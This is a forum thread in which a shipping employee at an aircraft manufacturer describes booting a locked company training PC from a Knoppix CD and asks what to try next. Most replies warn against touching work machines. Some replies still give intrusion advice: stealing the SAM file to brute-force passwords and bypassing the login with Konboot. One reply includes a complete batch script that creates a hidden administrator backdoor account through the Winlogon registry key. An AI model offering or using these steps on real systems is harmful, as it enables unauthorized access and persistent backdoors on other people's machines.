righteous_slave

Exploring Work Computers w/Knoppix

6 posts in this topic

Ok, started a new job in the shipping department at a airplane manufacturer. It's a pretty easy-going place, so I get to do some wandering around. Stashed in a corner is a couple of tables of computers for training. After watching for a while and noticing that no one is doing any training on them, I go and check them out. Greeted with a Windows login screen (and a warning that this is the company's computer and network), I tried a couple of default admin logins to no avail. Let's see what rebooting brings up. The BIOS is password protected, but these HP's also have a boot menu that is not locked. Coming back later with a KNOPPIX cd, I pop it in, reboot, choose the cd drive and am greeted with a penguin!

OK, now what? I'm a major linux noob, and am looking for suggestions for exercises to try to help learn my way through both KNOPPIX and exploring new systems. I'm not looking for corporate espionage or sabotage, just some learning suggestions.

0

Share this post


Link to post
Share on other sites

Wouldnt suggest playing with work computers but I would start by stealing the SAM file and trying to brute force some password.

0

Share this post


Link to post
Share on other sites

I wouldn't recommend using Knoppix on a work computer. In fact, I wouldn't recommend tampering with the computer at all. However, if you got permission, this is what I would do.

First off, if someone see's a penguin on the screen, chances are they will question what it is. I wouldn't suggest using Knoppix. You'll just attract attention to yourself. Use a program called Konboot, it will allow you to pop the CD in and continue with loading Windows, however, it re-writes the SAM file temporarily on-the-fly so that you can use any password to login. Once you're logged in as administrator, make your own account, and hide it.

This is an example created by IllWill over @ illmob

@echo off
net user illwill password /add && net localgroup administrators illwill /add
echo Windows Registry Editor Version 5.00> c:\hide.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]>> c:\hide.reg
echo "illwill"=dword:00000000>> c:\hide.reg
REGEDIT /S c:\hide.REG
DEL /Q c:\hide.REG
Exit

This will create the user "illwill" with the password "password" as an administrator and hide it from the user login.

After that, do as you must. If it's on a network, Wireshark might be a good start :tongue:

Again, I must warn you though, if you don't have permission, it's really not worth it..

0

Share this post


Link to post
Share on other sites

Like others have stated, I wouldn't mess with work computers. Especially, at a place that is considered a threat from terrorism and corporate espionage; like a place that manufacturers aircraft and aircraft parts. If a breach is discovered they'll likely assume worst case scenario and report it.

Just to play along, I'd do everything I could to get the admin password, as per phr34kc0der's suggestion. Chances are good one could then expand the attack to other systems, and possibly even the entire network. Keep in mind there are non-default ways to store the system startup key (syskey) that will make any local attack difficult, too, For example, it could encrypt the SAM with a totally different key from the login password, or the startup key could be located on a CD or floppy. But, chances are the machines are setup with the default syskey options.

Like others, I totally agree with leaving the systems alone, especially at a place that is bound with several government regulations (not sure if any involve reporting security breaches, though.)...

0

Share this post


Link to post
Share on other sites

I would leave them the hell alone. At two aircraft manufacturers I am familiar with, that is, at best, instant job termination. Getting caught using something that can be construed as an access tool equals corporate security talking with the prosecutors office about filing charges against you.

0

Share this post


Link to post
Share on other sites

I agree with the others. Leave them alone unless you have permission.

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now